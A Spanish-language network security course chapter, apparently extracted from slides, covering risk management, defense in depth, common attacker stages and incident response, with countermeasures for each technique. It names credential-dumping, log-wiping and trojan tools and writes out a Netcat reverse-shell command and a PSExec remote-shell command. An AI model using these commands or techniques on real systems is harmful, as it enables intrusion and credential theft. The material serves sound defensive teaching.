Professional Documents
Culture Documents
• Caso práctico
• Disciplina de administración de riesgos de seguridad
• Defensa en profundidad
• Respuesta a incidentes de seguridad
• Ejemplos de ataques
• Recomendaciones
• Diez normas de seguridad inmutables
1.8. Caso práctico
Cap1-01.jpg
Pérdida de beneficios
Perjuicio de la reputación de la organización
Pérdida o compromiso de la seguridad de los datos
Interrupción de los procesos empresariales
Deterioro de la confianza del cliente
Deterioro de la confianza del inversor
Consecuencias legales: en muchos estados o países, la incapacidad de
proteger un sistema tiene consecuencias legales; un ejemplo es Sarbanes
Oxley, HIPAA, GLBA, California SB 1386.
- Las infracciones de seguridad tienen efectos de gran repercusión.
Cuando existe una debilidad en la seguridad, ya sea real o sólo una
percepción, la organización debe emprender acciones inmediatas para
garantizar su eliminación y que los daños queden restringidos.
- Muchas organizaciones tienen ahora servicios expuestos a los clientes,
como los sitios Web. Los clientes pueden ser los primeros en observar el
resultado de un ataque. Por lo tanto, es esencial que la parte de una
compañía que se expone al cliente sea lo más segura posible.
Cap1-02.jpg
La evaluación implica:
Evaluación y valoración de activos.
Identificación de riesgos de seguridad con STRIDE.
Análisis y asignación de prioridad a los riesgos de seguridad con DREAD.
Seguimiento, planeamiento y programación de actividades relacionadas
con los riesgos de seguridad.
El funcionamiento incluye
Volver a valorar los activos nuevos y los que han sufrido cambios, así
como los riesgos de seguridad.
Estabilizar e implementar medidas preventivas nuevas o que han
cambiado.
1.12. Procesos
Cap1-03.jpg
Cap1-04.jpg
Cap1-05.jpg
Otros ataques podrían ser llevados a cabo únicamente con el propósito de que
el sistema de destino incurra en gastos. Por ejemplo, se podría montar un
ataque contra un servicio de fax o un teléfono celular para hacer un gran número
de llamadas internacionales que supongan un gran costo.
1.15. Amenazas comunes
Cap1-28.jpg
1.15.2. Vulnerabilidades
Cap1-29.jpg
Los ataques más acertados contra redes tienen éxito explotando el campo
común y las vulnerabilidades o debilidades sabidas. Asegúrese de entrenar a
administradores y reconocer estas vulnerabilidades para que lleguen a ser
familiares con nuevas vulnerabilidades cuando ellas se descubran.
Cap1-30.jpg
Los ataques contra redes siguen a menudo el mismo patrón. Métodos de diseño
para detectar, responder o prevenir ataques durante cada una de las siguientes
etapas:
DREAD
• Daño
• Capacidad de reproducción
• Capacidad de explotación
• Usuarios afectados
• Capacidad de descubrimiento
Cap1-31.jpg
1.18.
Cap1-06.jpg
1.19.
Cap1-07.jpg
1.20. Obtención
Cap1-08.jpg
Cap1-10.jpg
Cap1-13.jpg
Cap1-14.jpg
Cap1-15.jpg
El perímetro de red es el área de una red que está más expuesta a un ataque
del exterior. Los perímetros de red se pueden conectar a numerosos entornos
diferentes, que van desde socios comerciales a Internet. Cada organización usa
criterios distintos para definir su perímetro. Los criterios pueden incluir algunas o
todas las conexiones descritas en la diapositiva.
Cap1-16.jpg
Cap1-17.jpg
Uno puede tener una serie de redes en su organización y debe evaluar cada una
individualmente para asegurarse de que está asegurada apropiadamente. Se
enumeran abajo algunas maneras de implementar defensas de red:
Es probable que los sistemas de una red cumplan funciones específicas. Esto
afectará a la seguridad que se les aplique.
Se puede atacar a los hosts de red con funciones que se sabe que están
disponibles de forma predeterminada, aunque el servidor no las necesita
para realizar su función.
Los intrusos también podrían distribuir virus para emprender un ataque
automatizado.
El software instalado en sistemas de equipos podría tener puntos débiles
que los intrusos pueden aprovechar. Es importante permanecer informado
de todos los problemas de seguridad del software de su entorno.
Se debe evaluar cada host en su ambiente y crear las políticas que limitan cada
servidor solamente a esas tareas que se tienen que realizar. Esto crea otra
barrera de seguridad que un atacante necesitaría evitar antes de hacer cualquier
daño.
Las aplicaciones de red permiten que los clientes tengan acceso a los
datos y los traten. También constituyen un punto de acceso al servidor
donde se ejecutan las mismas.
Recordar que la aplicación proporciona un servicio a la red. Este servicio
no debe anularse con la implementación de seguridad.
Examinar las aplicaciones desarrolladas internamente, además de las
comerciales, en busca de problemas de seguridad.
Los intrusos cuyo interés son las aplicaciones pueden bloquear alguna
para conseguir que su funcionalidad deje de estar disponible.
Las aplicaciones pueden tener defectos que los atacantes pueden
manipular para ejecutar código malintencionado en el sistema.
Un intruso podría utilizar en exceso un servicio de modo que se
imposibilite su uso legítimo; éste es un tipo de ataque de denegación de
servicio.
Una aplicación también podría utilizarse para llevar a cabo tareas para las
que no esté destinada, como enrutar correo electrónico.
Cap1-24.jpg
Cap1-25.jpg
Una vez que se haya formulado una lista, identificar qué puede dañar su negocio
más, si está comprometido. Los daños posibles pueden incluir:
Tiempo muerto
Pérdida de negocio
Reputación dañada
Confianza del cliente
Uso fraudulento de la información
Responsabilidad Legal
Cap1-33.jpg
Footprinting
Scanning
Enumeration
Gaining Access
Privilege Escalation
Buffer Overflows
Shovel a Shell
Interactive Control
Camouflaging
Intelligence Gathering
Island Hopping
Denial of Service
Social Engineering
Hay muchas herramientas que pueden ayudar a un hacker a poner junta toda la
información sobre una compañía. Puede ser tan simple como usar un Search
Engine para encontrar la información tal como la que fija el detalle técnico de un
administrador, usar al USENET o detalles incluidos en publicidad de una
compañía.
Como resultado del footprinting, un hacker puede identificar la lista de red y las
direcciones IP utilizadas en la compañía. El siguiente paso lógico para un hacker
es el scanning. El uso de un atacante de herramientas y de la información es
para determinar qué sistemas estas vivos y accesibles desde Internet así como
qué puertos están escuchando en cualquier sistema dado. Con ese
conocimiento, el atacante puede apuntar los sistemas específicos que funcionan
con software o servicios específicos usando exploit conocidos.
Nota:
RestrictAnonymous = 1 es derrotado fácilmente por las ultimas
herramientas de enumeración (NBTEnum2.1.exe, DumpSec)
RestrictAnonymous=2 puede afectar la funcionalidad. Es esencial probar
sistemas críticos para asegurarse de que los cambios de la seguridad no
afectarán sistemas de producción de una manera negativa.
Renonbrar las cuentas administrativas es un buen punto para no utilizar
RestrictAnonymous configurado con valor =2 o bloquear el acceso a
puertos. NetBIOS una variedad de herramientas tienen la habilidad de
poder determinar cuentas administrativas basadas en SID / RID
enumerados vía queries NetBIOS.
Propósito:
Usar la información detallada acerca del sistema remoto, servicios, shares,
cuentas de usuarios, grupos, información de controladores de dominio, políticas
de cuentas, etc, habilita al atacante a utilizar herramientas con el intento de
atacar la seguridad de cuentas y servicios en el objetivo.
Nota:
El Port Redirector tiene que instalarse en un servidor detrás de un firewall.
Usar algún otro exploit (IIS buffer overflow, etc.). El resto de las pautas de
seguridad atenuarán a menudo el riesgo de este tipo de ataque.
Utilizar una política IPSec para permitir el acceso a los puertos abiertos
de las máquinas específicas.
El filtrado de ingreso parece ser usualmente la parte importante, pero el
filtrado de egreso es importante también!
En otras palabras si un IIS Server solamente necesita hablar con un solo
COM+ server en una DMZ en un puñado de puertos, configurar una
politica IPSec para hacer cumplir esta política, no permitir al server IIS
para comunicarse con cualquier servidor en la red en cualquier puerto,
¡filtro es tráfico de salida también!
Propósito:
Después que el atacante tiene identificado y accede al trafico del firewall que
puede permitir tráfico de entrada de un puerto origen 53, procurar instalar un
software Port Redirector en el equipo dentro del firewall. El Port Redirector
tomará el tráfico entrante destinado para un puerto (53) y lo enviará a otro
equipo detrás del firewall en otro puerto (3389).
Ejemplo:
FPipe.exe – herramienta port redirection de linea de commandos
Contramedidas:
El Port Redirector tiene que instalarse de alguna manera en un servidor detrás
del firewall usando otro exploit (IIS buffer overflow, etc.). El resto de las guías de
seguridad atenuarán el riesgo de este tipo de ataque.
Usar una política de IPSec para permitir solamente el acceso a los puertos
abiertos de las máquinas específicas.
Propósito:
Los atacantes consiguen los password hashes de la SAM en un sistema en línea
para comprometer cuentas adicionales.
Utilizan las herramientas por ejemplo PWdump2 que utiliza una técnica conocida
como ‘DLL injection’ para inyectar código malicioso en LSASS.EXE (a trusted
process). LSASS puede solicitar password hashes desencriptados para saltear
la protección de SYSKEY.
Ejemplos:
Samdump
Pwdump1,2,3,3e
LC3 / LC4
Contramedidas:
SYSKEY está habilitado por defecto en Windows 2000 en modo 0 y encripta con
hashes de 128bit. La key para desencriptar se guarda en registry.
Herramientas recientes como PWDump3,3e & LC3 (que usan PWDump) pueden
sortear todas las protecciones de ’ SYSKEY en todos los modos para extraer los
passwords.
Propósito:
Existen numerosos exploits de IIS para obtener una copia de la SAM.
El acceso físico incorrecto puede conceder el acceso a la SAM
Ej. ERD disk olvidado en el Floppy Drive, administradores locales se olvidan de
bloquear la consola.
¡Esto permite obtener una copia de la SAM con el fin el conseguir hashes!
Ejemplo
CHNTPW es una herramienta que funciona con UNIX y DOS. Un UNIX boot
floppy está disponible y puede obtener una copia de la SAM, SYSTEM y
SECURITY en una RAM drive para directamente ver y editar con CHNTPW.
Si la protección SYSKEY está habilitada (esto es por defecto en la SAM de
Windows 2000), CHNTPW no puede desencriptar los hashes almacenados en la
SAM pero puede escribir nuevos hashes en esta SAM habilitando al atacante el
cambio de password para una cuenta (ej. administrator). Con esta cuenta, luego
puede iniciar sesión y obtener el resto de las password (usando PWDump3 etc.).
Contramedidas
No permitir la copia de la SAM.
Deshabilitar el almacenamiento de LM hashed password en la SAM.
Habilitar SYSKEY en modo 2 o 3 para requerir una password ó un floppy
que contenga la key privada antes de poder iniciar sesion.
Si un atacante puede inhabilitar SYSKEY y escribir una nueva password
para el administrador en la SAM, todos los password hashes del resto de
las cuentas continuan encriptados y protegidos del ataque.
SYSKEY fue dasarrollado para encriptar todos los password hashes en la SAM
para prevenir cracking fuera de línea (Q143475 Windows NT System Key
Permits Strong Encryption of the SAM)
http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q143475)
No habilitado por defecto en NT 4.0, habilitado en modo 0 en Windows 2000.
También, si Getadmin.exe se ejecuta con una cuenta que sea ya un miembro del
grupo local de los administradores, continua funcionando (incluso luego de
aplicar el hotfix).
Propósito:
Las herramientas BO overflow un-checked buffers generan código en
aplicaciones de Server para causar ‘shellcode’ y ejecutarse (usualmente en
contexto ‘SYSTEM’ o ‘IWAM’ si explota IIS / SQL etc.)
Ejemplos:
JILL-WIN32.EXE
Explota IIS .printer overflow
IIS5hack.exe
ISPC.EXE
Exploits IIS .idq overflow
Unicodeloader.pl
HTTPODBC.DLL
SQL buffer overflows
Contramedidas:
Mantener al dia los hotfixes
Deshabilitar servicios innecesarios
Denegar protocolos no necesarios en router / firewall (filtrado ingreso/egreso)
Emplear un sistema IDS actualizado para denegar pedidos sospechosos /
conocidos como attack signaturas.
Propósito:
Herramientas de shell Remoto habilitan a los atacantes a acceder al ‘remote
command shell’ en el servidor destino. Los atacantes usan remote shell para
elevar sus privilegios.
Ejemplos:
Netcat
Nc.exe prove una conexion raw a servidores remotos via TCP.
Puede funcionar como un servidor o un cliente
Cryptcat, es igual que Netcat pero encripta los datos via un canal TCP
Nc.exe 10.1.1.10 5000 –e cmd.exe
‘shovel a shell’ de un servidor comprometido de nuevo a una máquina remota
cliente que funciona escuchando en la dirección 10.1.1.10 en el puerto 5000
PSExec.exe \\192.168.1.1 cmd.exe
Requiere acceso administrativo
Requiere acceso a NetBIOS (TCP 139)
Este comando contacta al servidor 192.168.1.1 , ejecuta en forma remota
CMD.EXE y conecta con la “command shell” del cliente.
Contramedidas:
Netcat (nc.exe) puede establecer una conexión TCP al servidor destino en
cualquier Puerto que esté escuchando y no sea utilizado. Es por eso que un
filtrado apropiado en el firewall previene este tipo de ataque.
Politicas IPSec para habilitar trafico entrante únicamente a los Puertos donde
corren servicios es un método eficaz (sólo habilitar trafico en el puerto 80 en
servidores IIS, denegar todo el trafico en otros puertos)
Propósito:
Llamados como ‘RATs’ (Remote Administration Tools).
Éstas son herramientas reales y cautelosas de Administracion Remota
contenidas en .exe llamados aleatoriamente (o camuflados en legitimos .exe).
¡Eso permite que un usuario remoto realice cualquier acción remotamente vía un
puerto a su elecion sin un usuario local del sistema que lo habilite!
Ejemplos:
Sub7, BO2k, NetBus, NT Rootkit
Sub7 es el más popular / NT Rootkit es el más avanzado
Contramedidas:
Puesto que la mayoría de los Trojanos escucha en un puerto para habilitar el
acceso remoto del atacante, un filtrado apropiado de puertos sería lo indicado
para prevenir este ataque.
Después que un hacker logra la entrada en una red, tratará de no dejar rastros
de su presencia y su paso a los Administradores. Hay varias herramientas que
un hacker puede utilizar. Por ejemplo, WinZapper y Elsave pueden ser utilizadas
para borrar registros de los logs de eventos.
Propósito:
Alertar a el atacante que alguien está investigando.
Se puede utilizar para ejecutar programas destructivos en nombre del
Administrador o instalar backdoor trojans.
Ejemplos:
Sobreescribir los comandos del sistema con comandos del trojano.
Reemplazar tlist.exe, kill.exe etc, con versiones especiales que no listen o
detengan procesos del atacante.
Sobreescribir CMD.EXE con una versión del atacante.
Contramedidas:
Generar las keys MD5 para todos los archivos del sistema importantes y
comprobar hashes con frecuencia.
Configurar una auditoria adecuada de archivos.
Usar permisos apropiados sobre los archivos.
1.48.11. Técnicas de Hacking: Intelligence Gathering
SNIFFING
Propósito:
Después de utilizar un sniffer el atacante está en condiciones de obtener
nombres de cuentas y passwords que pasen por la red en texto plano.
Puede ser utilizado para descubrir otras redes / equipos que pueden estar
comprometidos en un futuro.
Puede ser utilizado para descubrir otros sniffers.
Netmon utilizabroadcasts del protocolo BONE.
Los equipos Windows por defecto responden pedidos ARP (Unix puede
restringir respuestas ARP)
Ejemplos:
WinDump – sniffer de línea de comandos para Windows es similar a TCPDump
para Unix
Ethereal – GUI OSS sniffer similar al network monitor
ScoopLM – dedicado a NTLM hash sniffer
LC3 –usado para captura de hash
Contramedidas:
Usar la ultima versión de NTLM V2 o Kerberos (recomendado) en todos los
equipos de la red.
Usar IPSec para encriptar el trafico de red.
Usar redes switcheadas para evitar la captura de paquetes.
Island Hopping es una técnica de Hacking en la cual el hacker incorpora una red
de ordenadores débiles y después se traslada a partes más seguras de la red.
Esencialmente, están utilizando las mismas técnicas discutidas previamente
para ampliar su influencia dentro de un ambiente dado de red. Una cosa es para
un atacante comprometer un web server sin interés y sin la seguridad apropiada.
Es algo mucho más atractivo la red corporativa entera donde existen datos más
interesantes para la compañía.
HASH CRAMMING
Permite al usuario conseguir el acceso al sistema sin romper la contraseña
insertando un Hash capturado directamente en la memoria. Esta técnica puede
apresurar un ataque porque el atacante no necesita primero comprometer el
password de una cuenta.
CPU
Espacio en disco
Ancho de banda de red
Cualquier recurso o servicio
Perímetro
• El servidor de seguridad de red debe bloquearlo de acuerdo con su diseño
Red
• Buscar y detectar los sistemas vulnerables
• Desactivar las conexiones de red en los hosts vulnerables
• Utilizar cuarentena de RRAS para asegurar que los hosts de acceso
telefónico tengan aplicadas las revisiones adecuadas
Host
• Utilizar IPSec para permitir el uso del puerto UDP 135 entrante sólo en los
hosts que requieran RPC
• Utilizar Firewall de Windows para bloquear el tráfico entrante que no se
desea que llegue a los hosts (en Windows XP y versiones posteriores). En
este ejemplo, se ha producido la proliferación de una variedad del virus
Blaster. Se pueden tomar medidas en diversos niveles del modelo de
defensa en profundidad para impedir que un gusano ataque el puerto de
Protocolo de datagramas de usuario (UDP, User Datagram Protocol) 135.
Perímetro
• Examinar todos los archivos adjuntos en la puerta de enlace SMTP
Red
• Utilizar la cuarentena de RRAS para comprobar las revisiones aplicadas y las
firmas de virus
Aplicación
• Microsoft Office 98
• Comprobar que esté instalada la actualización de seguridad de Microsoft
Outlook® 98.
• Office 2000.
• Comprobar que esté instalado al menos el Service Pack 2
• Office XP y Office 2003
• La configuración predeterminada de zona de seguridad es sitios restringidos
(en lugar de Internet) y las secuencias de comandos activas dentro de los
sitios restringidos, también están deshabilitadas de forma predeterminada
Usuarios
• Enseñar a los usuarios que los archivos adjuntos pueden ser peligrosos.
• Si se recibe un archivo adjunto que no se ha pedido, escribir a su autor para
comprobar el propósito antes de abrirlo
Perímetro
• Habilitar o bloquear el servidor de seguridad
Red
• Desconectar el cable de red
Host
• Iniciar el sistema e inicie sesión
• Se pueden necesitar credenciales administrativas locales si las almacenadas
en caché están deshabilitadas
• Active Firewall de Windows para bloquear todo el tráfico entrante
• Volver a conectar el cable de red
• Descargar e instalar las revisiones apropiadas
• Reiniciar el sistema
• Desactivar Firewall de Windows según la directiva
• Es posible que un ataque infecte un equipo antes de que se puedan
aplicar las revisiones o correcciones.
• Para impedir que se produzcan daños en otros equipos de la red mientras
se lo repara, seguir estos pasos:
1. Desconectar el cable de red.
2. Iniciar el sistema e iniciar sesión. Se pueden necesitar credenciales
administrativas locales si las almacenadas en caché están
deshabilitadas.
3. Activar Firewall de Windows para bloquear todo el tráfico entrante.
4. Volver a conectar el cable de red.
5. Descargar e instale la revisión.
6. Reiniciar el sistema.
7. Desactive Firewall de Windows de acuerdo con la directiva.
1.55. Recomendaciones
Recomendaciones de seguridad.
Lista de comprobación de la seguridad.
Defensa en profundidad
Seguro por diseño
Privilegios mínimos
Aprender de los errores cometidos
Mantener la seguridad
Hacer que los usuarios se centren en la concienciación de seguridad
Desarrollar y probar planes y procedimientos de respuesta a
incidentes
Cap1-27.jpg
Ejercicio 3: Cómo configurar Firewall de Windows para permitir el uso del puerto
3389
Caso práctico
Disciplina de administración de riesgos de seguridad
Defensa en profundidad
Respuesta a incidentes de seguridad
Ejemplos de ataques
Recomendaciones
Diez normas de seguridad inmutables